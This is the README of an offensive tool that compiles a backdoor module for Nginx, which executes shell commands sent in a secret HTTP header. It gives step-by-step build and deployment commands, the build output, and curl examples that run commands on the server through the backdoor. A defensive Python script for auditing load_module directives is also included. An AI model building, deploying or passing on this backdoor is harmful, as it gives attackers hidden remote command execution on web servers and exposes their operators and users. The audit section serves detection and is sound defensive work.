# nginx-backdoor-mod
`nginx-backdoor-mod` is a penetration testing tool designed to create a custom Nginx module that adds a backdoor for executing system commands via HTTP headers. This tool is intended for authorized security testing to evaluate the security of Nginx-based web servers.
> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.
## Features
- **Dynamic Nginx Module Creation**: Build a custom Nginx module with a specified name and backdoor header.
- **Command Execution via HTTP Headers**: Execute system commands on the server by sending a specific HTTP header.
- **Support for Multiple Nginx Versions**: Download and build against specified Nginx releases from `nginx.org`.
- **Dockerized Build Environment**: Use a Docker container to ensure consistent build dependencies.
- **List Available Nginx Releases**: Retrieve a list of available Nginx versions for module compilation.
## Installation
### Prerequisites
- **Docker**: Required to build the module in a consistent environment.
- **Bash**: For running the build scripts.
- **curl**: For downloading Nginx source code.
### Steps
- Clone the repository:
```
$ git clone https://cgit.heqnx.com/nginx-backdoor-mod
$ cd nginx-backdoor-mod
```
- Build the Docker environment with the Nginx module build script:
```
$ ./build.sh
[...]
$ usage: build-nginx-backdoor-mod.sh [-l] [-r -n]
-l list nginx releases
-r choose release
-n set name for the built nginx module
-h print this help message and exit
```
## Usage
### Command-Line Flags
```
$ ./build.sh
[...]
$ usage: build-nginx-backdoor-mod.sh [-l] [-r -n]
-l list nginx releases
-r choose release
-n set name for the built nginx module
-h print this help message and exit
```
### Examples
#### List available Nginx releases
```
$ ./build-nginx-backdoor-mod.sh -l
[inf] releases provided by nginx.org
nginx-1.24.0.tar.gz
nginx-1.25.0.tar.gz
nginx-1.26.0.tar.gz
[...]
```
#### Build a backdoor module for Nginx 1.20.1
```
$ ./build.sh -r nginx-1.20.1.tar.gz -n test
[inf] downloading https://nginx.org/download/nginx-1.20.1.tar.gz
[inf] extracting nginx-1.20.1.tar.gz to /root/nginx-backdoor-mod
[inf] configure successful
[inf] successfully built test.so
[inf] output module "/root/nginx-backdoor-mod/test_v1.20.1_X-325901e0f4512f4c22a43a6eb455ae0b.so"
[inf] use "X-325901e0f4512f4c22a43a6eb455ae0b" for backdoor authentication + command execution
[inf] example: curl http://localhost -H 'X-325901e0f4512f4c22a43a6eb455ae0b: ls -la'
[inf] enable with nginx module config in /etc/nginx/modules-enabled and "load_module /path/to/test.so;"
[inf] enable with the main nginx config in /etc/nginx/nginx.conf and "load_module /path/to/test.so;"
```
#### Deploy the module
- Copy the generated `.so` file (e.g., `test_v1.20.1_X-<random>.so`) to your Nginx server’s modules directory (e.g., `/usr/lib/nginx/modules/`).
- Add the module to your Nginx configuration in `/etc/nginx/nginx.conf` or a file in `/etc/nginx/modules-enabled/`:
```
load_module /usr/lib/nginx/modules/test_v1.20.1.so;
```
- Reload or restart Nginx:
```
$ nginx -s reload
$ systemctl restart nginx
```
- Test the backdoor by sending a command via the specified header:
```
$ curl http://localhost -H 'X-<random>: whoami'
```
## Technical Details
- **Docker Build**: The tool uses a Dockerfile to create an Ubuntu-based environment with dependencies (`build-essential`, `libpcre3`, `zlib1g`, `libssl-dev`, `curl`).
- **Module Template**: The `ngx_mod_template/` directory contains a `config` file and `ngx_mod_template.c`, which are modified during the build to set the module name and backdoor header.
- **Backdoor Mechanism**: The module checks for a specific HTTP header (randomly generated during the build) and executes its value as a shell command using `/bin/sh`.
- **Output**: The compiled module is saved as `<name>_v<version>_<header>.so` in the `nginx-backdoor-mod/` directory.
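For defenders reviewing a host after such a test, the `load_module` directive and the output naming described above are the artifacts to audit. The following is an added example, not code from this project: it lists active `load_module` directives in a configuration dump and flags any module that is not on an allowlist or that matches the `<name>_v<version>_<header>.so` pattern. The sample configuration, the allowlist and the 32-hex-character header length (taken from the README's example output) are assumptions.

```python
import re

# Constructed sample of a main nginx config; not taken from any real host.
SAMPLE_CONF = """\
load_module modules/ngx_http_image_filter_module.so;
# load_module /tmp/old.so;
load_module /usr/lib/nginx/modules/test_v1.20.1.so;
load_module "/usr/lib/nginx/modules/cache_v1.20.1_X-0123456789abcdef0123456789abcdef.so";
events {}
"""

# Assumed allowlist: module file names your packages are expected to install.
ALLOWED = {"ngx_http_image_filter_module.so"}

# An active directive: load_module <path>; with optional double quotes.
LOAD_MODULE = re.compile(r'^\s*load_module\s+"?([^";\s]+)"?\s*;', re.M)

# Output naming from the README: <name>_v<version>_<header>.so, where the
# example header is "X-" followed by 32 hex characters (assumed fixed length).
TOOL_NAME = re.compile(r"_v\d+(\.\d+)+_X-[0-9a-f]{32}\.so$")


def loaded_modules(conf_text):
    """Return module paths from active (uncommented) load_module directives."""
    no_comments = re.sub(r"#.*", "", conf_text)
    return LOAD_MODULE.findall(no_comments)


def audit(conf_text, allowed=ALLOWED):
    """Return (path, reason) for every module that needs a closer look."""
    findings = []
    for path in loaded_modules(conf_text):
        name = path.rsplit("/", 1)[-1]
        if TOOL_NAME.search(name):
            findings.append((path, "matches nginx-backdoor-mod output naming"))
        elif name not in allowed:
            # A renamed module loses the telltale name, so the allowlist
            # is the primary control and the name pattern only a hint.
            findings.append((path, "not in module allowlist"))
    return findings


if __name__ == "__main__":
    for path, reason in audit(SAMPLE_CONF):
        print(f"{path}: {reason}")
```

On a live host, feed it the output of `nginx -T`, which dumps the main configuration together with every included file, so directives under `/etc/nginx/modules-enabled/` are covered as well.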
## License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.
## Disclaimer
`nginx-backdoor-mod` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.